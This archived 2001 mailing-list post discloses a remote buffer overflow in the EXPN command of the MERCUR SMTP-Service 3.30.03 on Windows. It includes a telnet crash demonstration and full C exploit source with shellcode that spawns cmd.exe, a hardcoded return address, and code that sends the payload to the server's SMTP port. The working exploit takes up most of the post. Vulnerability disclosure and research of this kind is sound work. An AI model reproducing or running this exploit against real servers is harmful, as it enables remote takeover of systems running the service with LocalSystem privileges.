OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Martin NA (martinDIRECT.SPB.RU)
Date: Fri Feb 23 2001 - 06:32:10 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    By default SMTP server is installed to be run from
    LocalSystem account.
    This makes it easy to make any action on the target
    system if an attacker
    could gain control over the code execution flow of the
    product.

    Particulary, MERCUR SMTP-Service (binary
    MCRSMTP.EXE version 3.30.3.0)
    suffers from buffer overflow illustrated below:

    -- Telnet session start --

    220 MERCUR SMTP-Server (v3.30.03 Unregistered)
    for Windows NT ready at Thu,
    15 F
    eb 2001 03:55:34 -0800
    EXPN
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    Connection to host lost.

    C:\>

    -- Telnet session end --

    Submission of string which contains address the
    processor should jump to at
    position 133,134,135 and 136 will gain full control
    over the machine...

    Here is exploit that runs an instance of cmd.exe on
    target host:

    /*
     MERCUR Mailserver 3.3 Remote Buffer Overflow
     Tested on Win2K AS SP1 with MERCUR SMTP-
    Server v3.30.03
     Martin Rakhmanoff
     martindirect.spb.ru
    */

    #include <winsock2.h>
    #include <stdio.h>

    /* \x63\x6D\x64\x2E\x65\x78\x65 - simply 'cmd.exe' */
    char shellcode[] =
     "\x8B\xC4\x83\xC0\x17\x50\xB8\x0E\xB5\xE9\x77
    \xFF\xD0\x33\xDB\x53"
     "\xB8\x2D\xF3\xE8\x77\xFF\xD0\x63\x6D\x64
    \x2E\x65\x78\x65\x0D\x0A";
    /*
    In SoftICE bpx 001b:00418b65 - here eip is restored
    with overwritten
    value...
    */

    int main(int argc, char * argv[]){

     int i;
     char sploit[512];
     char buffer[512];

     WSADATA wsaData;
     SOCKET sock;
     struct sockaddr_in server;
     struct hostent *hp;

     WSAStartup(0x202,&wsaData);
     hp = gethostbyname("arena");
     memset(&server,0,sizeof(server));
     memcpy(&(server.sin_addr),hp->h_addr,hp-
    >h_length);
     server.sin_family = hp->h_addrtype;
     server.sin_port = htons(25);
     sock = socket(AF_INET,SOCK_STREAM,0);
     connect(sock,(struct sockaddr*)&server,sizeof
    (server));

     sploit[0]='E';
     sploit[1]='X';
     sploit[2]='P';
     sploit[3]='N';
     sploit[4]=0x20;

     for(i=5;i<137;i++){
      sploit[i]=0x41;
     }

     // Return address
     //77E87D8B

     sploit[137]=0x8B;
     sploit[138]=0x89;
     sploit[139]=0xE8;
     sploit[140]=0x77;

     for(i=0;i<sizeof(shellcode);i++){
      sploit[i+141]=shellcode[i];
     }

     recv(sock,buffer,512,0);

     send(sock,sploit,173,0);

     closesocket(sock);
     WSACleanup();

     return 0;
    }

    Vendor was notified but no action was done...

    Martin